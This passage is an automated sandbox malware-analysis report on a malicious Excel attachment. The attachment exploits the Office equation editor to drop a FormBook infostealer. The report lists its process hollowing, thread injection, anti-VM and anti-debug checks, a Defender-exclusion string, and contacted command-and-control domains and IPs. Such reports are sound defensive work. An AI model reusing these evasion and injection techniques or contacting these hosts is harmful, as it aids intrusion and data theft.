Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F07AC NtCreateMutant,LdrInitializeThunk, 7_2_021F07AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_021EFAE8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFB50 NtCreateKey,LdrInitializeThunk, 7_2_021EFB50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_021EFB68
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_021EFBB8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EF900 NtReadFile,LdrInitializeThunk, 7_2_021EF900
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EF9F0 NtClose,LdrInitializeThunk, 7_2_021EF9F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_021EFED0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFFB4 NtCreateSection,LdrInitializeThunk, 7_2_021EFFB4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_021EFC60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFD8C NtDelayExecution,LdrInitializeThunk, 7_2_021EFD8C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_021EFDC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F0048 NtProtectVirtualMemory, 7_2_021F0048
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F0078 NtResumeThread, 7_2_021F0078
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F0060 NtQuerySection, 7_2_021F0060
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F10D0 NtOpenProcessToken, 7_2_021F10D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F010C NtOpenDirectoryObject, 7_2_021F010C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F1148 NtOpenThread, 7_2_021F1148
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F01D4 NtSetValueKey, 7_2_021F01D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFA20 NtQueryInformationFile, 7_2_021EFA20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFA50 NtEnumerateValueKey, 7_2_021EFA50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFAB8 NtQueryValueKey, 7_2_021EFAB8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFAD0 NtAllocateVirtualMemory, 7_2_021EFAD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFBE8 NtQueryVirtualMemory, 7_2_021EFBE8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EF8CC NtWaitForSingleObject, 7_2_021EF8CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EF938 NtWriteFile, 7_2_021EF938
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F1930 NtSetContextThread, 7_2_021F1930
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFE24 NtWriteVirtualMemory, 7_2_021EFE24
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFEA0 NtReadVirtualMemory, 7_2_021EFEA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFF34 NtQueueApcThread, 7_2_021EFF34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFFFC NtCreateProcessEx, 7_2_021EFFFC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFC30 NtOpenProcess, 7_2_021EFC30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFC48 NtSetInformationFile, 7_2_021EFC48
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F0C40 NtGetContextThread, 7_2_021F0C40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFC90 NtUnmapViewOfSection, 7_2_021EFC90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021EFD5C NtEnumerateKey, 7_2_021EFD5C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F1D80 NtSuspendThread, 7_2_021F1D80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D85F0 NtCreateFile, 7_2_000D85F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D86A0 NtReadFile, 7_2_000D86A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D8720 NtClose, 7_2_000D8720
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D8642 NtCreateFile, 7_2_000D8642
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D869D NtReadFile, 7_2_000D869D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D871A NtClose, 7_2_000D871A
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: RFQ HCI20220113.xlsx Virustotal: Detection: 33%
Source: RFQ HCI20220113.xlsx ReversingLabs: Detection: 30%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$RFQ HCI20220113.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF028.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@7/18@9/8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: vbc.exe.2.dr, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc[1].exe.2.dr, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.11a0000.2.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.2.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.6.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.8.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.1.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.11a0000.4.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.10.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.3.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.4.unpack, u0005u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_011A6167 push 3A000004h; retf 0000h 4_2_011A616C
Source: C:\Users\Public\vbc.exe Code function: 4_2_011A642A push es; retf 4_2_011A6437
Source: C:\Users\Public\vbc.exe Code function: 4_2_011A7296 push FFFFFFA1h; iretd 4_2_011A72A2
Source: C:\Users\Public\vbc.exe Code function: 4_2_011A6AFF push es; iretd 4_2_011A6B51
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E6295 push edi; ret 4_2_002E6296
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EB630 pushfd ; ret 4_2_002EB631
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EB69C pushfd ; ret 4_2_002EB69E
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EB6E2 pushfd ; ret 4_2_002EB6E3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B842 push eax; ret 5_2_0041B848
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B84B push eax; ret 5_2_0041B8B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_004188F2 push ds; ret 5_2_004188F3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8AC push eax; ret 5_2_0041B8B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00416109 push cs; iretd 5_2_0041610A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415237 pushfd ; iretd 5_2_00415238
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7F5 push eax; ret 5_2_0041B848
Source: C:\Users\Public\vbc.exe Code function: 5_2_011A6167 push 3A000004h; retf 0000h 5_2_011A616C
Source: C:\Users\Public\vbc.exe Code function: 5_2_011A7296 push FFFFFFA1h; iretd 5_2_011A72A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_011A6AFF push es; iretd 5_2_011A6B51
Source: C:\Users\Public\vbc.exe Code function: 5_2_011A642A push es; retf 5_2_011A6437
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021FDFA1 push ecx; ret 7_2_021FDFB4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D6109 push cs; iretd 7_2_000D610A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D5237 pushfd ; iretd 7_2_000D5238
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DB7F5 push eax; ret 7_2_000DB848
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DB84B push eax; ret 7_2_000DB8B2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DB842 push eax; ret 7_2_000DB848
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DB8AC push eax; ret 7_2_000DB8B2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000D88F2 push ds; ret 7_2_000D88F3
Source: initial sample Static PE information: section name: .text entropy: 7.74258433139

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 4.2.vbc.exe.2626be0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2647ca8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2540, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 00000000000C8614 second address: 00000000000C861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 00000000000C89AE second address: 00000000000C89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1828 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2548 Thread sleep time: -38872s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1612 Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 2812 Thread sleep time: -34000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 38872
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F26F8 mov eax, dword ptr fs:[00000030h] 5_2_008F26F8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022026F8 mov eax, dword ptr fs:[00000030h] 7_2_022026F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.terapiaholisticaemformacao.com
Source: C:\Windows\explorer.exe Network Connect: 103.224.212.220 80
Source: C:\Windows\explorer.exe Network Connect: 195.211.74.112 80
Source: C:\Windows\explorer.exe Domain query: www.ylhwcl.com
Source: C:\Windows\explorer.exe Domain query: www.integratedheartspsychology.com
Source: C:\Windows\explorer.exe Domain query: www.circlessalaries.com
Source: C:\Windows\explorer.exe Network Connect: 221.121.143.148 80
Source: C:\Windows\explorer.exe Domain query: www.topeasyip.company
Source: C:\Windows\explorer.exe Network Connect: 216.172.160.188 80
Source: C:\Windows\explorer.exe Network Connect: 23.80.120.93 80
Source: C:\Windows\explorer.exe Domain query: www.ecommerceoptimise.com
Source: C:\Windows\explorer.exe Network Connect: 122.10.28.11 80
Source: C:\Windows\explorer.exe Domain query: www.bjbwx114.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.98.251 80
Source: C:\Windows\explorer.exe Domain query: www.orphe.biz
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 49D90000
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY